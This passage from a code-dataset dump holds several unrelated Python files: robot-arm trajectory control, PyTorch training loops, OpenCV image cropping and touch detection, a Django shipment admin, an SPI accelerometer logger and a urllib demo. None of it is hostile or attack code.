Path\nfrom geometry_msgs.msg import PoseStamped, Point, Vector3\nfrom collections import defaultdict\nfrom tf2_ros import Buffer, TransformListener\nfrom tf2_geometry_msgs import do_transform_pose\nfrom std_msgs.msg import Header\nfrom copy import deepcopy\nfrom math import radians, ceil\nfrom sensor_msgs.msg import JointState\nimport actionlib\nfrom control_msgs.msg import FollowJointTrajectoryAction, FollowJointTrajectoryGoal\nfrom trajectory_msgs.msg import JointTrajectoryPoint, JointTrajectory\nimport sys\nfrom std_srvs.srv import Empty\n\nERROR = 0\n\n# Config - These define the motion to be completed. You can modify this, but if you want multiple options, you may\n# want to modify the code to take it through a sys.argv\n# (e.g. running it like \"rosrun apple_grasper perform_grasp.py 0.05 0.20\nretreat_dist = 0.05 # How far back does the arm move? + means backwards\nrotation = radians(20) # How much should the end effector rotate? Currently assumes around Z axis\nvel = 0.04 # What's the speed the arm should move?\ninterp_N = 20 # How many points should be interpolated for the trajectory?\nsum_abs_radian_warn = radians(10) # If any total movement exceeds this amount, issue a warning\n\n# Frames\n# THESE FRAMES SHOULD NOT BE CHANGED because the kinematics solver assumes these references\nur_base_link = 'base'\nur_end_link = 'tool0'\n\n# THESE FRAMES CAN BE CHANGED as they are not bound to the UR5 program code\ntool_frame = 'test_frame' # What is the frame you're trying to move?\n # IMPORTANT! THIS FRAME MUST BE STATIC w.r.t. ur_end_link\nmovement_frame = 'base_link' # What frame is the movement/rotation vector defined in?\nmovement_vector = [0, -retreat_dist, 0] # What's the linear movement you want in the movement frame?\nmovement_rpy = [0, 0, rotation] # What's the rotation you want in the movement frame, centered around tool_frame's origin?\n\ndef update_error(msg):\n global ERROR\n ERROR = msg.in_error.val\n\n# def generate_ur_pose(pose):\n# quat = pose.orientation\n# rx, ry, rz = euler_from_quaternion([quat.x, quat.y, quat.z, quat.w])\n# x, y, z = pose.position.x, pose.position.y, pose.position.z\n# format_str = 'p[{}]'.format(','.join(['{:.3f}'] * 6))\n# return format_str.format(x, y, z, rx, ry, rz)\n\n# def format_array(array):\n#\n# values = ','.join(['{}'.format(x) for x in array])\n# return '[{}]'.format(values)\n#\n#\n# def format_array_decimal(array):\n# values = ','.join(['{:.2f}'.format(x) for x in array])\n# return '[{}]'.format(values)\n\n\ndef get_tf(target, source, stamp = rospy.Time(0)):\n tf_buffer.can_transform(target, source, stamp, rospy.Duration(0.5))\n tf = tf_buffer.lookup_transform(target, source, stamp)\n return tf\n\ndef point_to_array(pt):\n # Also works on vectors!\n return np.array([pt.x, pt.y, pt.z])\n\ndef quat_to_array(quat):\n return np.array([quat.x, quat.y, quat.z, quat.w])\n\ndef tare_force():\n urscript_pub.publish('zero_ftsensor()\\n')\n\n# def issue_linear_velocity_command(array):\n# array_str = format_array_decimal(array)\n# rospy.loginfo_throttle(0.025, array_str)\n# cmd = \"speedl({},-5.0,0.05)\\n\".format(array_str)\n# urscript_pub.publish(cmd)\n\ndef issue_stop():\n cmd = \"stopl(50.0)\\n\"\n urscript_pub.publish(cmd)\n\n# def generate_move_command(pose, a, v, t=0, linear=False):\n#\n# cmd = 'movel' if linear else 'movej'\n#\n# ur_pose = generate_ur_pose(pose)\n# format_str = '{}({}, a={:.3f}, v={:.3f}, t={:.3f}, r=0)'\n# return format_str.format(cmd, ur_pose, a, v, t)\n\ndef ros_pose_slerp(start, end, n):\n\n frame = None\n if isinstance(start, PoseStamped):\n frame = start.header.frame_id\n start = start.pose\n end = end.pose\n\n start_pos = point_to_array(start.position)\n end_pos = point_to_array(end.position)\n\n positions = np.linspace(start_pos, end_pos, n, endpoint=True)\n quats = [quaternion_slerp(quat_to_array(start.orientation), quat_to_array(end.orientation), i) for i in np.linspace(0, 1, n, endpoint=True)]\n\n poses = [Pose(Point(*pos), Quaternion(*quat)) for pos, quat in zip(positions, quats)]\n if frame is not None:\n header = Header()\n header.frame_id = frame\n poses_stamped = [PoseStamped(header, pose) for pose in poses]\n return poses_stamped\n return poses\n\n\n# def run_force_mode(pose, selection_vector, wrench, limits):\n# \"\"\"\n# Refer to the URScript manual for the definitions of each of the arguments.\n# :param pose: A ROS pose defining a frame in which the forces are defined.\n# :param selection_vector: A Boolean array which specifies compliant axes.\n# :param wrench: A vector for the wrench to be applied for each axis.\n# :param limits: For compliant axes, a velocity limit. For non-compliant axes, an absolute position limit deviation.\n# :return:\n# \"\"\"\n#\n# ur_pose = generate_ur_pose(pose)\n# selection_vector = format_array(np.array(selection_vector).astype(bool).astype(int))\n# wrench = format_array_decimal(wrench)\n# limits = format_array_decimal(limits)\n#\n# cmd = 'force_mode({}, {}, {}, 2, {})\\nsync()\\n'.format(ur_pose, selection_vector, wrench, limits)\n# urscript_pub.publish(cmd)\n\n\ndef ros_quat_to_euler(q):\n return np.array(euler_from_quaternion([q.x, q.y, q.z, q.w]))\n\ndef construct_joint_point(position, t):\n point = JointTrajectoryPoint()\n point.positions = position\n if not isinstance(t, rospy.Duration):\n t = rospy.Duration(t)\n point.velocities = [0.0] * len(position)\n point.accelerations = [0.0] * len(position)\n point.time_from_start = t\n return point\n\ndef convert_mat_to_pose(mat):\n quat = Quaternion(*quaternion_from_matrix(mat))\n pos = Point(mat[0,3], mat[1,3], mat[2,3])\n return Pose(pos, quat)\n\ndef convert_tf_to_pose(tf):\n pose = PoseStamped()\n pose.pose = Pose(Point(*point_to_array(tf.transform.translation)), tf.transform.rotation)\n pose.header.frame_id = tf.header.frame_id\n\n return pose\n\ndef convert_pose_to_tf(pose_stamped, frame_id):\n # frame_id is the ID of the frame which is located at the pose in the given frame\n tf = TransformStamped()\n tf.header.frame_id = frame_id\n tf.child_frame_id = pose_stamped.header.frame_id\n tf.transform.translation = Vector3(*point_to_array(pose_stamped.pose.position))\n tf.transform.rotation = pose_stamped.pose.orientation\n\n return tf\n\n\ndef convert_poses_to_trajectory(poses, initial_joint_state, linear_vel, leeway = 2.0, warn_threshold = 0):\n\n\n last_joints = initial_joint_state.position\n last_pos = np.array(urkin.fwd_kin(last_joints)[:3,3]).T[0]\n\n\n traj = JointTrajectory()\n traj.header.stamp = rospy.Time.now()\n traj.joint_names = initial_joint_state.name\n traj.points.append(construct_joint_point(last_joints, 0.0))\n\n # Kind of a hack, offset correction due to fwd kins not being exact\n\n believed_pos = point_to_array(urkin.fwd_kin(last_joints, o_unit='p').position)\n correction = believed_pos - point_to_array(poses[0].position)\n\n joints = [last_joints]\n\n t = 0.0\n for pose in poses:\n\n pose.position = Point(*point_to_array(pose.position) + correction)\n new_pos = point_to_array(pose.position)\n new_joints = urkin.inv_kin(pose, last_joints)\n dt = max(np.linalg.norm(new_pos - last_pos) / linear_vel * leeway, 0.01)\n t += dt\n traj.points.append(construct_joint_point(new_joints, t))\n\n last_joints = new_joints\n last_pos = new_pos\n\n joints.append(new_joints)\n\n if warn_threshold > 0:\n joints = np.array(joints)\n sum_abs_diff = np.abs(joints[:-1] - joints[1:]).sum(axis=1)\n if np.any(sum_abs_diff > warn_threshold):\n rospy.logwarn('Detected a large joint movement! Either near singularity or need to increase path resolution')\n sys.exit(1)\n\n goal = FollowJointTrajectoryGoal()\n goal.trajectory = traj\n\n return goal\n\n\nif __name__ == '__main__':\n\n # Initialization stuff - subscribers, publishers, service proxies, action clients\n rospy.init_node('move_arm')\n tf_buffer = Buffer()\n tf_listener = TransformListener(tf_buffer)\n rospy.Subscriber('/ur_driver/robot_status', RobotStatus, update_error, queue_size=1)\n urscript_pub = rospy.Publisher('/ur_driver/URScript', String, queue_size=1)\n traj_client = actionlib.SimpleActionClient('follow_joint_trajectory', FollowJointTrajectoryAction)\n if not traj_client.wait_for_server(rospy.Duration(5.0)):\n msg = 'Can\\'t connect to action server for trajectory uploading!'\n rospy.logwarn(msg)\n rospy.signal_shutdown(msg)\n sys.exit(1)\n\n start_recording = rospy.ServiceProxy('start_recording', Empty)\n stop_recording = rospy.ServiceProxy('stop_recording', Empty)\n\n # # Uncomment this section to allow freedriving the arm\n # # TODO: May require sending a stop_freedrive() command to the arm after setting to False - modify freedrive_node.py\n # rospy.set_param('freedrive', True)\n # raw_input('Please freedrive the arm to the desired grasping position, then hit Enter')\n # rospy.set_param('freedrive', False)\n # rospy.sleep(1.0)\n\n # Get the current location of the end effector\n stamp = rospy.Time.now()\n\n tool_to_ur_base_tf = get_tf(ur_base_link, tool_frame, stamp)\n movement_to_ur_base_tf = get_tf(ur_base_link, movement_frame, stamp)\n static_tool_to_ur_ee_pose = convert_tf_to_pose(get_tf(ur_end_link, tool_frame, stamp))\n tool_to_rotation_tf = get_tf(movement_frame, tool_frame, stamp)\n\n # Define a pose in the movement frame whose origin is at the current tool frame's origin (in the movement frame)\n # plus any desired movement, and the rotation is the desired rotation\n\n tool_origin = point_to_array(tool_to_rotation_tf.transform.translation)\n\n # TODO: This desired movement should be fine tuned to whatever application you need\n # Right now it just assumes a negative z movement, but in reality it can be whatever you need\n desired_movement = PoseStamped()\n desired_movement.header.frame_id = movement_frame\n desired_movement.pose.position = Point(*tool_origin + np.array(movement_vector))\n # Kinda hacky, sorry\n desired_rotation_mat = euler_matrix(*movement_rpy) # THIS IS WHERE YOUR DESIRED ROTATION GOES\n o = tool_to_rotation_tf.transform.rotation\n composite_rotation = desired_rotation_mat.dot(quaternion_matrix([o.x, o.y, o.z, o.w]))\n desired_movement.pose.orientation = Quaternion(*quaternion_from_matrix(composite_rotation))\n\n current_tool_pose = convert_tf_to_pose(tool_to_ur_base_tf)\n final_tool_pose = do_transform_pose(desired_movement, movement_to_ur_base_tf)\n\n # Each pose in the interpolated poses actually represents an orientation of the frame relative to the offset\n # Therefore you are transforming a static offset in the tool frame with a variable transform\n interp_poses = ros_pose_slerp(current_tool_pose, final_tool_pose, interp_N)\n interpolated_tool_poses = [do_transform_pose(static_tool_to_ur_ee_pose, convert_pose_to_tf(pose, static_tool_to_ur_ee_pose.header.frame_id)).pose for pose in interp_poses]\n\n # Convert the poses into a trajectory which can be received by the action client\n joint_start = rospy.wait_for_message('/joint_states', JointState)\n goal = convert_poses_to_trajectory(interpolated_tool_poses, joint_start, vel, warn_threshold=sum_abs_radian_warn)\n\n # Pre-grasp preparation\n tare_force()\n rospy.sleep(1.0)\n start_recording()\n\n # You probably want your grasping function here\n grasp = lambda: None\n grasp()\n\n # Send the trajectory to the server\n try:\n traj_client.send_goal_and_wait(goal, goal.trajectory.points[-1].time_from_start * 2)\n finally:\n issue_stop()\n\n # Final stuff\n stop_recording()\n","sub_path":"src/perform_grasp.py","file_name":"perform_grasp.py","file_ext":"py","file_size_in_byte":12471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"254475469","text":"#!/usr/bin/env python\n\nimport itertools\n\nfrom typing import Callable, Sequence, Tuple\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom torch.nn.utils.clip_grad import clip_grad_norm_\nfrom torch.optim import Optimizer\nfrom torch.utils.data import DataLoader, TensorDataset, SubsetRandomSampler\n\nfrom molecular_cross_validation.train.cosine_scheduler import CosineWithRestarts\n\nTransform = Callable[[torch.Tensor], torch.Tensor]\n\n\ndef split_dataset(\n *xs: torch.Tensor, batch_size: int, indices: np.ndarray = None, n_train: int = None\n):\n if indices is None:\n indices = np.random.permutation(xs[0].shape[0])\n\n if n_train is None:\n n_train = int(0.875 * xs[0].shape[0])\n\n ds = TensorDataset(*xs)\n\n training_dl = DataLoader(\n dataset=ds,\n batch_size=batch_size,\n sampler=SubsetRandomSampler(indices[:n_train]),\n )\n\n validation_dl = DataLoader(\n dataset=ds,\n batch_size=batch_size,\n sampler=SubsetRandomSampler(indices[n_train:]),\n )\n\n return training_dl, validation_dl\n\n\ndef train_epoch(\n model: nn.Module,\n criterion: nn.Module,\n optim: Optimizer,\n data_loader: DataLoader,\n input_t: Transform,\n clip_norm: float = None,\n):\n \"\"\"Iterate through training data, compute losses and take gradient steps\n\n :param model: a torch Module that can take input data and return the prediction\n :param criterion: a loss function\n :param optim: a torch Optimizer\n :param data_loader: training dataset. Should produce a tuple of tensors: the first\n is used as input and the last is the target. If the tuple has\n only one element then it's used for both\n :param input_t: Transformation to apply to the input\n :param clip_norm: clip gradient norm to a given absolute value\n :return: total loss for the epoch, averaged over the number of batches\n \"\"\"\n total_epoch_loss = 0.0\n\n for data in data_loader:\n y = model(input_t(data[0]))\n loss = criterion(y, data[0])\n\n total_epoch_loss += loss.data.item()\n\n optim.zero_grad()\n loss.backward()\n if clip_norm is not None:\n clip_grad_norm_(model.parameters(), clip_norm)\n optim.step()\n\n return total_epoch_loss / len(data_loader)\n\n\ndef evaluate_epoch(\n model: nn.Module,\n criterion: nn.Module,\n data_loader: DataLoader,\n input_t: Transform,\n eval_i: Sequence[int],\n):\n \"\"\"Iterate through test data and compute losses\n\n :param model: a torch Module that can take input data and return the prediction\n :param criterion: a loss function\n :param data_loader: validation dataset. Should produce a tuple of tensors: the first\n is used as input and the last is the target. If the tuple has\n only one element then it's used for both\n :param input_t: Transformation to apply to the input\n :param eval_i: Index into the DataLoader tuple for evaluation\n :return: total loss for the epoch, averaged over the number of batches\n \"\"\"\n total_epoch_loss = 0.0\n\n for data in data_loader:\n y = model(input_t(data[0]))\n loss = criterion(y, *(data[i] for i in eval_i))\n\n total_epoch_loss += loss.data.item()\n\n return total_epoch_loss / len(data_loader)\n\n\ndef train_until_plateau(\n model: nn.Module,\n training_loss: nn.Module,\n optim: Optimizer,\n training_data: DataLoader,\n validation_data: DataLoader,\n input_t: Transform,\n min_cycles: int = 3,\n threshold: float = 0.01,\n scheduler_kw: dict = None,\n verbose: bool = False,\n) -> Tuple[list, list]:\n \"\"\"Train a model with cosine scheduling until validation loss stabilizes. This\n function uses CosineWithRestarts to train until the learning rate stops improving.\n\n :param model: torch Module that can take input data and return the prediction\n :param training_loss: The loss function used for training the model\n :param optim: torch Optimizer (will zero the gradient after testing)\n :param training_data: Training dataset. Should produce tuples of Tensors, all but\n the last are considered to be input and the last is the target\n :param validation_data: Validation dataset in the same format\n :param input_t: Function to apply to the input\n :param min_cycles: Minimum number of cycles to run before checking for convergence\n :param threshold: Tolerance threshold for calling convergence\n :param scheduler_kw: dictionary of keyword arguments for CosineWithRestarts\n :param verbose: Print training progress to stdout\n :return: Lists of training and validation loss and correlation values\n \"\"\"\n\n assert 0.0 <= threshold < 1.0\n\n if scheduler_kw is None:\n scheduler_kw = dict()\n\n train_loss = []\n val_loss = []\n\n scheduler = CosineWithRestarts(optim, **scheduler_kw)\n best = np.inf\n rel_epsilon = 1.0 - threshold\n neg_epsilon = 1.0 + threshold\n cycle = 0\n\n for epoch in itertools.count():\n optim.zero_grad() # just make sure things are zeroed before train loop\n model.train()\n\n train_loss.append(\n train_epoch(\n model=model,\n criterion=training_loss,\n optim=optim,\n data_loader=training_data,\n input_t=input_t,\n clip_norm=100.0,\n )\n )\n\n model.eval()\n val_loss.append(\n evaluate_epoch(\n model=model,\n criterion=training_loss,\n data_loader=validation_data,\n input_t=input_t,\n eval_i=[0],\n )\n )\n\n scheduler.step()\n if scheduler.starting_cycle:\n if verbose:\n print(\n f\"[epoch {epoch:03d}] average training loss: {train_loss[-1]:.5f}\"\n )\n cycle += 1\n\n if 0 <= val_loss[-1] < best * rel_epsilon:\n best = val_loss[-1]\n elif 0 > val_loss[-1] and val_loss[-1] < best * neg_epsilon:\n best = val_loss[-1]\n elif cycle >= min_cycles:\n break\n\n return train_loss, val_loss\n","sub_path":"src/molecular_cross_validation/train/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"100890729","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n'''\r\n@author: Danny\r\n@contact: kedanlin@hotmail.com\r\n@file: cut_img.py\r\n@time: 2019/5/23 22:49\r\n@desc:\r\n'''\r\n\r\nimport cv2\r\n\r\n150,355,206\r\n# answers_location = ((,),(,),(,),(,),(,),(,),(,),(,))\r\nanswers_location = [(150,355,0,206),\r\n (150,355,206,412),\r\n (150,355,412,618),\r\n (150,355,618,824),\r\n (355,558,0,206),\r\n (355,558,206,412),\r\n (355,558,412,618),\r\n (355,558,618,824)]\r\nFilePath = r'./images/'\r\ndef cut_question(old_file_name, question_file_name):\r\n img = cv2.imread(FilePath + old_file_name)\r\n question = img[0:150,0:824] # 裁剪坐标为[y0:y1, x0:x1]\r\n cv2.imwrite(FilePath + question_file_name, question)\r\n\r\n\r\ndef cut_answer(old_file_name):\r\n img = cv2.imread(FilePath + old_file_name)\r\n i = 1\r\n for al in answers_location:\r\n answer = img[al[0]:al[1], al[2]:al[3]]\r\n cv2.imwrite(FilePath + str(i) + '_' + old_file_name, answer)\r\n i = i+1\r\n\r\nif __name__ == '__main__':\r\n cut_answer('math.jpg')\r\n cut_question('math.jpg','math_question.jpg')","sub_path":"cut_img.py","file_name":"cut_img.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"522043473","text":"#!/usr/bin/env python3\nimport numpy\nimport cv2\nimport logging\n\nclass TouchCapture:\n def __init__(self):\n self.initialize_detector_params()\n self.detector = cv2.SimpleBlobDetector_create(self.params)\n\n def open(self, camera):\n self.cap = cv2.VideoCapture(camera)\n # The Ailipu camera I used runs fastest at VGA\n self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\n self.flush_frames()\n self.reset_background(10)\n self.update_frame()\n\n def get_frame(self):\n ret, image = self.cap.read()\n return cv2.cvtColor(image,cv2.COLOR_BGR2GRAY) \n\n def flush_frames(self):\n # Flush some frames\n for i in range(15):\n self.get_frame()\n\n # Create blob detector parameters hand tuned for this use case\n def initialize_detector_params(self):\n self.params = cv2.SimpleBlobDetector_Params()\n self.params.filterByCircularity = True\n self.params.minCircularity = 0.4\n logging.debug(\"Circularity %d %d\", self.params.minCircularity, self.params.maxCircularity)\n\n self.params.filterByConvexity = True\n self.params.minConvexity = 0.4\n logging.debug(\"Convexity %d %d\", self.params.minConvexity, self.params.maxConvexity)\n\n self.params.filterByInertia = True\n logging.debug(\"Inertia %d %d\", self.params.minInertiaRatio, self.params.maxInertiaRatio)\n\n self.params.filterByArea = True\n self.params.minArea = 10\n self.params.maxArea = 500\n logging.debug(\"Area %d %d\", self.params.minArea, self.params.maxArea)\n\n self.params.minDistBetweenBlobs = 3.0\n logging.debug(\"minDistBetweenBlobs %d\", self.params.minDistBetweenBlobs)\n\n self.params.minRepeatability = 2\n logging.debug(\"minRepeatability %d\", self.params.minRepeatability)\n\n self.params.blobColor = 255\n self.params.minThreshold = 10\n self.params.maxThreshold = 60\n self.params.thresholdStep = 5\n logging.debug(\"Threshold %d %d %d\", self.params.minThreshold, self.params.maxThreshold, self.params.thresholdStep)\n\n # Average a specified number of frames to mitigate noise\n def reset_background(self, num_frames):\n image = self.get_frame()\n\n image = numpy.float32(image)/255.0\n average = image.copy()\n\n for i in range(num_frames):\n image = self.get_frame()\n\n image = numpy.float32(image)/255.0\n cv2.accumulateWeighted(image, average, 1.0/num_frames)\n\n self.background = numpy.uint8(average*255.0)\n\n def update_frame(self):\n # Capture frame-by-frame\n self.frame = self.get_frame()\n self.frame = cv2.subtract(self.frame, self.background)\n return self.frame\n\n def get_points(self):\n # Update the blob detector\n return self.detector.detect(self.frame)\n\n def close(self):\n self.cap.release()\n\n\nif __name__ == \"__main__\":\n\n logging.basicConfig(level=logging.DEBUG)\n\n capture = TouchCapture()\n capture.open(1)\n frame = capture.update_frame()\n tick = cv2.getTickCount()\n\n while(True):\n frame = capture.update_frame()\n \n keypoints = capture.get_points()\n frame = cv2.drawKeypoints(frame, keypoints, numpy.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\n # Display the resulting frame\n cv2.imshow('frame', frame)\n\n # Time the loop\n new_tick = cv2.getTickCount()\n t = (new_tick-tick)/cv2.getTickFrequency()\n tick = new_tick\n logging.debug(\"t {:05.3f} fps {:05.2f}\".format(t, 1.0/t))\n\n key = cv2.waitKey(1) & 0xFF\n if key == ord('q'):\n break\n elif key == ord('b'):\n # Reset the background image\n capture.reset_background(10)\n\n # When everything done, release the capture\n capture.close()\n cv2.destroyAllWindows()\n","sub_path":"touch/touch.py","file_name":"touch.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"591497347","text":"from django.contrib import admin\nfrom django.utils.html import format_html\nfrom django.urls import reverse\nfrom rangefilter.filter import DateRangeFilter\n\nfrom apps.shipments.models import Shipment, Location, TransitState\nfrom apps.jobs.models import AsyncJob\n\nfrom .filter import StateFilter\nfrom .historical import BaseModelHistory\n\n\nclass AsyncJobInlineTab(admin.TabularInline):\n model = AsyncJob\n fields = (\n 'job_id',\n 'state',\n 'method',\n 'created_at',\n 'last_try',\n )\n readonly_fields = (\n 'job_id',\n 'state',\n 'method',\n 'created_at',\n 'last_try',\n )\n\n def method(self, obj):\n try:\n params = obj.parameters\n return params['rpc_method']\n except KeyError:\n pass\n return \"??\"\n\n def job_id(self, obj):\n return format_html(\n '<a href=\"{}\" target=\"_blank\">{}</a>',\n reverse('admin:jobs_asyncjob_change', kwargs={'object_id': obj.id}),\n obj.id\n )\n\n def has_add_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n\nNON_SCHEMA_FIELDS = [\n 'asyncjob',\n 'ethaction',\n 'permissionlink',\n 'loadshipment',\n 'trackingdata',\n 'document',\n 'id',\n 'owner_id',\n 'storage_credentials_id',\n 'vault_id',\n 'vault_uri',\n 'device',\n 'shipper_wallet_id',\n 'carrier_wallet_id',\n 'moderator_wallet_id',\n 'updated_at',\n 'created_at',\n 'contract_version',\n 'updated_by',\n 'state',\n 'delayed',\n 'expected_delay_hours',\n 'exception'\n]\n\n\nclass ShipmentAdmin(admin.ModelAdmin):\n # Read Only admin page until this feature is worked\n list_display = ('id', 'owner_id', 'shippers_reference', 'created_at', 'updated_at', 'shipment_state', )\n fieldsets = (\n (None, {\n 'classes': ('extrapretty', ),\n 'fields': (\n 'id',\n ('updated_at', 'created_at',),\n ('owner_id', 'updated_by',),\n ('shipper_wallet_id', 'carrier_wallet_id', 'moderator_wallet_id',),\n ('storage_credentials_id', 'vault_id',),\n 'state',\n 'vault_uri',\n 'device',\n 'contract_version',\n )\n }),\n ('Shipment Schema Fields', {\n 'classes': ('collapse',),\n 'description': f'Fields in the {format_html(\"<a href={}>Schema</a>\", \"http://schema.shipchain.io\")}',\n 'fields': [field.name for field in Shipment._meta.get_fields() if field.name not in NON_SCHEMA_FIELDS]\n })\n )\n\n inlines = [\n AsyncJobInlineTab,\n ]\n\n search_fields = ('id', 'shipper_wallet_id', 'carrier_wallet_id', 'moderator_wallet_id', 'state', 'owner_id',\n 'ship_from_location__name', 'ship_to_location__name', 'final_destination_location__name',\n 'bill_to_location__name', )\n\n list_filter = [\n ('created_at', DateRangeFilter),\n ('updated_at', DateRangeFilter),\n ('delayed', admin.BooleanFieldListFilter),\n ('state', StateFilter),\n ]\n\n def shipment_state(self, obj):\n return TransitState(obj.state).label.upper()\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n def has_add_permission(self, request):\n return False\n\n def has_change_permission(self, request, obj=None):\n return False\n\n\nclass HistoricalShipmentAdmin(BaseModelHistory, ShipmentAdmin):\n readonly_fields = [field.name for field in Shipment._meta.get_fields()]\n\n\nclass LocationAdmin(BaseModelHistory):\n fieldsets = [(None, {'fields': [field.name for field in Location._meta.local_fields]})]\n\n readonly_fields = [field.name for field in Location._meta.get_fields()]\n\n search_fields = ('id', 'name__contains', )\n","sub_path":"apps/shipments/admin/shipment.py","file_name":"shipment.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"173177043","text":"import spidev\nimport time\nfrom time import perf_counter\nimport csv\nimport datetime\nimport ADXL362\n\n\n\ndef main():\n\n # 書き込むファイルの作成\n dt_now = datetime.datetime.now()\n filename = './csv/' + dt_now.strftime('%m-%d_%H-%M-%S') + '.csv'\n print(dt_now.strftime('%m%d_%H-%M-%S'))\n\n # ファイルオープン\n f = open(filename, 'w')\n writer = csv.writer(f, lineterminator='\\n')\n csvlist = []\n\n # #初期設定\n # spi = spidev.SpiDev() \n # spi.open(0,0)\n # spi.mode = 3 #ADXL345このデバイスはSPI mode3で動作\n # spi.max_speed_hz = 1000000\n \n # spi.xfer2([0x2D, 0x02]) #測定スタート\n\n # #初期設定\n # spi2 = spidev.SpiDev() \n # spi2.open(0,1)\n # spi2.mode = 3 #ADXL345このデバイスはSPI mode3で動作\n # spi2.max_speed_hz = 1000000\n \n # spi2.xfer2([0x2D, 0x02]) #測定スタート\n\n accel_0 = ADXL362.ADXL362(0, 0)\n accel_0.begin_measure()\n accel_1 = ADXL362.ADXL362(0,1)\n accel_1.begin_measure()\n\n try:\n while True:\n #x,y,z方向の加速度を取得(2の補数表現)\n\n # x_data_list = spi.xfer2([0xc0|0x32, 0x00, 0x00])\n # y_data_list = spi.xfer2([0xc0|0x34, 0x00, 0x00])\n # z_data_2_1_list = spi.xfer2([0xc0|0x36, 0x00, 0x00])\n # x_data = x_data_list[1] | (x_data_list[2] << 8)\n # y_data = y_data_list[1] | (y_data_list[2] << 8)\n # z_data_1 = z_data_1_list[1] | (z_data_1_list[2] << 8\n\n x_data_1 = accel_0.read_xyz()[0]\n y_data_1 = accel_0.read_xyz()[1]\n z_data_1 = accel_0.read_xyz()[2]\n\n #2の補数を10進に変換\n if(x_data_1 & 0x8000):\n x_data_1 = ((~x_data_1 & 0xFFFF) + 1)*-1\n if(y_data_1 & 0x8000): \n y_data_1 = ((~y_data_1 & 0xFFFF) + 1)*-1\n if(z_data_1 & 0x8000):\n z_data_1 = ((~z_data_1 & 0xFFFF) + 1)*-1\n #加速度に変換(Dレンジ ±2g)\n x_data_1 = 2 * 9.8 * x_data_1 / 0x7FFF\n y_data_1 = 2 * 9.8 * y_data_1 / 0x7FFF\n z_data_1 = 2 * 9.8 * z_data_1 / 0x7FFF\n csvlist.append([perf_counter(),x_data_1,y_data_1,z_data_1,\"#1\"])\n\n print(perf_counter(),\"#1\")\n print('x: {:4.2f}, y: {:4.2f}, z: {:4.2f} [m/s^2]'.format(x_data_1, y_data_1, z_data_1))\n # time.sleep(0.1)\n\n # #x,y,z方向の加速度を取得(2の補数表現)\n # x_data_2_list = spi2.xfer2([0xc0|0x32, 0x00, 0x00])\n # y_data_1_list = spi2.xfer2([0xc0|0x34, 0x00, 0x00])\n # z_data_2_list = spi2.xfer2([0xc0|0x36, 0x00, 0x00])\n # x_data_2 = x_data_2_list[1] | (x_data_2_list[2] << 8)\n # y_data_2 = y_data_2_list[1] | (y_data_2_list[2] << 8)\n # z_data_2 = z_data_2_list[1] | (z_data_2_list[2] << 8)\n\n x_data_2 = accel_1.read_xyz()[0]\n y_data_2 = accel_1.read_xyz()[1]\n z_data_2 = accel_1.read_xyz()[2]\n\n #2の補数を10進に変換\n \n if(x_data_2 & 0x8000):\n x_data_2 = ((~x_data_2 & 0xFFFF) + 1)*-1\n if(y_data_2 & 0x8000): \n y_data_2 = ((~y_data_2 & 0xFFFF) + 1)*-1\n if(z_data_2 & 0x8000):\n z_data_2 = ((~z_data_2 & 0xFFFF) + 1)*-1\n #加速度に変換(Dレンジ ±2g)\n x_data_2 = 2 * 9.8 * x_data_2 / 0x7FFF\n y_data_2 = 2 * 9.8 * y_data_2 / 0x7FFF\n z_data_2 = 2 * 9.8 * z_data_2 / 0x7FFF\n\n csvlist.append([perf_counter(),x_data_2,y_data_2,z_data_2,\"#2\"])\n\n print(perf_counter(),\"#2\")\n print('x: {:4.2f}, y: {:4.2f}, z: {:4.2f} [m/s^2]'.format(x_data_2, y_data_2, z_data_2))\n # time.sleep(0.1)\n\n \n except KeyboardInterrupt:\n writer.writerows(csvlist)\n f.close()\n print('!FINISH!')\n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"spi-acc/adxl362spi.py","file_name":"adxl362spi.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"34266480","text":"from urllib import request\nfrom urllib import parse\n\n# request.urlretrieve('http://www.hao123.com','hao123.xml')\n\n# response=request.urlopen('http://www.baidu.com')\nurl = 'http://www.baidu.com/s'\n\nparams = {'name': '呆呆', 'age': 1, 'greetings': 'Hello world'}\n\nqs = parse.urlencode(params)\nqsencode = qs.encode('utf-8')\n\nprint(type(qs))\n\nprint(type(qsencode))\n\nurl = url + \"?\" + qs\n\nresponse = request.urlopen(url)\n\nresult = parse.parse_qs(qs)\n\n# print(response.read())\n","sub_path":"venv/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"527638879","text":"\"\"\"Main file used to prepare training data, train, and test HMMs.\n HMM EX = python3 main.py --test_type standard --train_iters 25 50 --users Naoki --hmm_insertion_penalty -70\n SBHMM EX = python3 main.py --test_type standard --users Naoki --train_iters 25 50 --sbhmm_iters 25 50 --train_sbhmm --sbhmm_cycles 1 --no_pca --include_word_level_states --include_word_position --parallel_classifier_training --parallel_jobs 4 --hmm_insertion_penalty -70 --sbhmm_insertion_penalty -115\n\"\"\"\n\"\"\"Main file used to prepare training data, train, and test HMMs.\n HMM EX = python3 main.py --test_type standard 